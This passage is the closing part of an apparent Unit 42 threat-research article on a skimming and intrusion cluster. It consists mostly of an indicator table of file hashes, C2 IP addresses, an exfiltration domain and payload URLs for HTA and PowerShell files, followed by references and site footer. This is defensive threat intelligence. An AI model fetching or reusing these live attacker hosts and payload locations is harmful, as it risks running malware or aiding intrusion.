| 5d82f31bc37aa18e5c5110968b1a85aa419c6e2840e17074d2519ed9ad5b914c | SHA256     | Usage of mixed mode assemblies |
| 5ef5c841f74f9331efb5a43cd16d62fd27eb8293888e872a17c7a57795e37d75 | SHA256     | Usage of mixed mode assemblies |
| 7dadff4d883b32c01bbcb96baf081649dbfadd186b934a7fd3c9754e0ba87ab3 | SHA256     | Usage of mixed mode assemblies |
| 8ae2b420245ebbd983d42bb2d8ceb92f2e7ef40181d8f1cb347797ee7a61b2a1 | SHA256     | Usage of mixed mode assemblies |
| c0244fafbd5231730fdd0bfef2a972dd074f52ca46dc377494424269add81d2b | SHA256     | Usage of mixed mode assemblies |
| c73e3b300ac9eb956a471cefb2282602834b5809c46b7807cfc06f671a5d9f8f | SHA256     | Usage of mixed mode assemblies |
| f9e5e09788.ipv6.1433.eu.org                                      | Domain     | Connectivity checks            |
| http://20.222.194\[.\]41/SecurityHealthSystray.hta               | URL        | MSHTA payload                  |
| http://20.210.230.146/SecurityHealthSystray.hta                  | URL        | MSHTA payload                  |
| http://13.78.113\[.\]103/One.ps1                                 | URL        | PowerShell payload             |
| http://13.71.153\[.\]8/logtest.ps1                               | URL        | PowerShell payload             |
| nigntboxcdn\[.\]com                                              | FQDN       | Exfiltration                   |
| 342daa41ba3989d5ecb95c7c19a55c1a00c12b6c2faa2cac052bc910a6edd56f | SHA256     | Web shell                      |
| 28f0f37fcdee2ac2c022bb454b30f05458075434fa57662af2de22ba5cfb45c1 | SHA256     | Web shell                      |
| 29a81d3125ab1c886266a03902204253708f8d181c547a88ceb447ef59f99f60 | SHA256     | Web shell                      |
| 9b29964d0b3d026aa01713dbdf4361439788c05c8eb8723fc7cfb933245dec45 | SHA256     | Web shell                      |
| 311935e115d678adbe502c8cc4e5396323f3f015ee186df6dc9f67ae0248104b | SHA256     | Web shell                      |
| 06710575d20cacd123f83eb82994879367e07f267e821873bf93f4db6312a97b | SHA256     | Web shell                      |
| 20\[.\]37.116.136                                                | IP address | C2                             |
| 167\[.\]88.168.11                                                | IP address | C2                             |
| 45\[.\]61.166.209                                                | IP address | C2                             |
| 172\[.\]86.123.127                                               | IP address | C2                             |
| 48\[.\]218.138.60                                                | IP address | C2                             |
| 172\[.\]86.105.129                                               | IP address | C2                             |
| 172\[.\]86.96.245                                                | IP address | C2                             |
| 20\[.\]188.26.190                                                | IP address | C2                             |
| 13\[.\]78.113.103                                                | IP address | C2                             |
| 13\[.\]78.94.29                                                  | IP address | C2                             |
| 52\[.\]253.107.167                                               | IP address | C2                             |
| 20\[.\]89.43.151                                                 | IP address | C2                             |
| 20\[.\]222.194.41                                                | IP address | C2                             |
| 20\[.\]222.138.18                                                | IP address | C2                             |
| 60\[.\]204.201.75                                                | IP address | C2                             |
| 5acac9846035863b178ff75fb2a8bdcd53e5d496007d032c3fb20e0dc8306fd9 | SHA256     | Shellcode runner               |
| b1d10328d0cbe3413d1ec15888e5772e323798072fda1285f17b61a96bf0e34e | SHA256     | Unknown                        |
| 91a5f92908c561f1d1814d36da613c5b7411bb45554e1b2d19713f1f6d50a10c | SHA256     | Cobalt Strike                  |
| 8240d49629a558acc0426dff40c042fa989fb46159bb5971ee3c4211b68a59d0 | SHA256     | Unknown                        |
| a2a17e561d50f69e011598fd2e03b0376f6468609a1b2d6be9d458ee5c8b397d | SHA256     | Unknown                        |
| b1da7982199597882a2da8c45114f4cf74fed64447fca8c5f58ced24d7085c77 | SHA256     | Reverse shell                  |
| 1c9a9732d600d975b5b44ab326d5cc99123a84d5b400a189902ff6d249a24bda | SHA256     | Reverse shell                  |

## **Additional Resources**

* [It's Silent Skimmer: Online Payment Scraping Campaign Shifts Targets From APAC to NALA](https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala) -- BlackBerry
* [Into the tank with Nitrogen](https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/) -- Sophos News
* [Mixed (Native and Managed) Assemblies](https://learn.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=msvc-170) -- Microsoft Learn
* [Challenge 6: à la mode](https://www.mandiant.com/sites/default/files/2022-11/06-alamode.pdf) \[PDF\] -- Mandiant FLARE-On Challenge on mixed mode assemblies
* [Don't check out! -- Credit card skimming activity observed](https://cybersecurity.att.com/blogs/security-essentials/dont-check-out-credit-card-skimming-activity-observed) -- LevelBlue
* [GitHub - T4y1oR/RingQ: 一款后渗透免杀工具，助力每一位像我这样的脚本小子快速实现免杀，支持bypass AV/EDR 360 火绒 Windows Defender Shellcode Loader](https://github.com/T4y1oR/RingQ) -- T4y1oR on GitHub
* [BlackCat ransomware shuts down in exit scam, blames the "feds"](https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/) -- Bleeping Computer
* [Playbook Of The Week - Fending Off Living Off the Land Attacks](https://www.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/) -- Palo Alto Networks
* [AI Skills Challenge, Primitive: Mshta.exe](<https://learn.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v=winembedded.5)?redirectedfrom=MSDN>) -- Microsoft Learn
* [System Binary Proxy Execution: Mshta, Sub-technique T1218.005](https://attack.mitre.org/techniques/T1218/005/) -- MITRE ATT\&CK
* [AI Skills Challenge, HTML Applications](<https://learn.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN>) -- Microsoft Learn
* [Reflective Code Loading, Technique T1620 - Enterprise](https://attack.mitre.org/techniques/T1620/) -- Techniques, MITRE ATT\&CK

Back to top

### Tags

* [C++](https://unit42.paloaltonetworks.com/tag/c/ "C++")
* [CL-CRI-0941](https://unit42.paloaltonetworks.com/tag/cl-cri-0941/ "CL-CRI-0941")
* [CVE-2017-11317](https://unit42.paloaltonetworks.com/tag/cve-2017-11317/ "CVE-2017-11317")
* [CVE-2019-18935](https://unit42.paloaltonetworks.com/tag/cve-2019-18935/ "CVE-2019-18935")
* [GodPotato](https://unit42.paloaltonetworks.com/tag/godpotato/ "GodPotato")
* [Python](https://unit42.paloaltonetworks.com/tag/python/ "Python")
* [Remote Code Execution](https://unit42.paloaltonetworks.com/tag/remote-code-execution/ "Remote Code Execution")
* [Reverse shells](https://unit42.paloaltonetworks.com/tag/reverse-shells/ "reverse shells")
* [RingQ loader](https://unit42.paloaltonetworks.com/tag/ringq-loader/ "RingQ loader")
* [Silent Skimmer](https://unit42.paloaltonetworks.com/tag/silent-skimmer/ "Silent Skimmer")
* [Telerik UI](https://unit42.paloaltonetworks.com/tag/telerik-ui/ "Telerik UI")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Automatically Detecting DNS Hijacking in Passive DNS](https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/ "Automatically Detecting DNS Hijacking in Passive DNS")

### Table of Contents

* 

### Related Articles

* [The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "article - table of contents")
* [Pickle in the Middle -- Hijacking Vertex AI Model Uploads for Cross-Tenant RCE](https://unit42.paloaltonetworks.com/hijacking-vertex-ai-model/ "article - table of contents")
* [Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution](https://unit42.paloaltonetworks.com/captive-portal-zero-day/ "article - table of contents")

## Related Cybercrime Resources

![Pictorial representation of Russian global webmail espionage campaign. A digital illustration of a world map in a network style, highlighting continents with glowing lines and connectivity points in a red and blue theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/07/06_Nation-State-cyberattacks_1920x900-1-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) July 23, 2026 [#### Russian Global Webmail Espionage](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)

* [CL-STA-1114](https://unit42.paloaltonetworks.com/tag/cl-sta-1114/ "CL-STA-1114")

* [JavaScript](https://unit42.paloaltonetworks.com/tag/javascript/ "JavaScript")

* [Javascript injection](https://unit42.paloaltonetworks.com/tag/javascript-injection/ "javascript injection")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/ "Russian Global Webmail Espionage")  
  ![Pictorial representation of a woman standing in a server room holding a laptop that projects a digital code overlay.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/06_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) May 28, 2026 [#### 2026 World Cup: Discussing The World's Biggest Game's Attack Surface](https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/)

* [Fiddling Scorpius](https://unit42.paloaltonetworks.com/tag/fiddling-scorpius/ "Fiddling Scorpius")

* [Fighting Ursa](https://unit42.paloaltonetworks.com/tag/fighting-ursa/ "Fighting Ursa")

* [Muddled Libra](https://unit42.paloaltonetworks.com/tag/muddled-libra/ "Muddled Libra")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/ "2026 World Cup: Discussing The World’s Biggest Game’s Attack Surface")  
  ![Pictoral representation of a man holding a cellphone with a bokeh skyline in the background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Listicle_Category_1505x922-718x440.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) May 27, 2026 [#### Out of the Crypt: The Evolving Cyber Extortion Economy](https://unit42.paloaltonetworks.com/cyber-extortion-economy/)

* [Bling Libra](https://unit42.paloaltonetworks.com/tag/bling-libra/ "Bling Libra")

* [Extortion](https://unit42.paloaltonetworks.com/tag/extortion/ "Extortion")

* [Frontier AI](https://unit42.paloaltonetworks.com/tag/frontier-ai/ "Frontier AI")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/cyber-extortion-economy/ "Out of the Crypt: The Evolving Cyber Extortion Economy")  
  ![Pictorial representation of the APT Boggy Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/Boggy-Serpens-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) March 16, 2026 [#### Boggy Serpens Threat Assessment](https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/tag/advanced-persistent-threat/ "Advanced Persistent Threat")

* [Boggy Serpens](https://unit42.paloaltonetworks.com/tag/boggy-serpens/ "Boggy Serpens")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/ "Boggy Serpens Threat Assessment")  
  ![Pictorial representation of Muddled Libra, aka Scattered Spider. A vibrant illustration of the Libra zodiac sign, featuring a stylized balance scale overlaid with a prominent Libra symbol. The background is a starry night sky with shades of purple and blue, suggesting a cosmic theme.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/03-1-Muddle-Libra-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)Threat Actor Groups](https://unit42.paloaltonetworks.com/category/threat-actor-groups/) February 10, 2026 [#### A Peek Into Muddled Libra's Operational Playbook](https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/)

* [Muddled Libra](https://unit42.paloaltonetworks.com/tag/muddled-libra/ "Muddled Libra")

* [PowerShell](https://unit42.paloaltonetworks.com/tag/powershell/ "PowerShell")

* [Scattered Spider](https://unit42.paloaltonetworks.com/tag/scattered-spider/ "Scattered Spider")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/ "A Peek Into Muddled Libra’s Operational Playbook")  
  ![Pictorial representation of a group of individuals discussing an idea with a whiteboard.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/02_Listicle_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) February 3, 2026 [#### Why Smart People Fall For Phishing Attacks](https://unit42.paloaltonetworks.com/psychology-of-phishing/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [Phishing](https://unit42.paloaltonetworks.com/tag/phishing/ "phishing")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/psychology-of-phishing/ "Why Smart People Fall For Phishing Attacks")  
  ![Pictorial representation of threat groups from Russia. The silhouette of a bear and the Ursa constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/Ursa-Russia-B-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) January 29, 2026 [#### Understanding the Russian Cyberthreat to the 2026 Winter Olympics](https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [IoT](https://unit42.paloaltonetworks.com/tag/iot/ "IoT")

* [Russia](https://unit42.paloaltonetworks.com/tag/russia/ "Russia")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/ "Understanding the Russian Cyberthreat to the 2026 Winter Olympics")  
  ![Pictorial representation of 01flip ransomware written in Rust. Digital artwork of a pixelated U.S. dollar bill disintegrating into small blocks against a blue data matrix background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/05_Ransomware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) December 10, 2025 [#### 01flip: Multi-Platform Ransomware Written in Rust](https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/)

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [CL-CRI-103](https://unit42.paloaltonetworks.com/tag/cl-cri-103/ "CL-CRI-103")

* [Cryptocurrency](https://unit42.paloaltonetworks.com/tag/cryptocurrency/ "Cryptocurrency")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/ "01flip: Multi-Platform Ransomware Written in Rust")  
  ![Pictorial representation of malicious LLMs. Close-up view of a digital wall displaying various glowing icons, representing a high-tech network interface.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/AdobeStock_1270203474-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) November 25, 2025 [#### The Dual-Use Dilemma of AI: Malicious LLMs](https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/tag/credential-harvesting/ "Credential Harvesting")

* [Data exfiltration](https://unit42.paloaltonetworks.com/tag/data-exfiltration/ "data exfiltration")

* [LLM](https://unit42.paloaltonetworks.com/tag/llm/ "LLM")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/ "The Dual-Use Dilemma of AI: Malicious LLMs")  
  ![Pictorial representation of Gh0st RAT malware. A woman analyzes code on a computer screen in an office setting, with another individual working in the background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/04_Security-Technology_Category_1505x922-718x440.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) November 14, 2025 [#### Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/)

* [DLL Sideloading](https://unit42.paloaltonetworks.com/tag/dll-sideloading/ "DLL Sideloading")

* [Gh0st Rat](https://unit42.paloaltonetworks.com/tag/gh0st-rat/ "Gh0st Rat")

* [PDNS](https://unit42.paloaltonetworks.com/tag/pdns/ "PDNS")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/ "Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
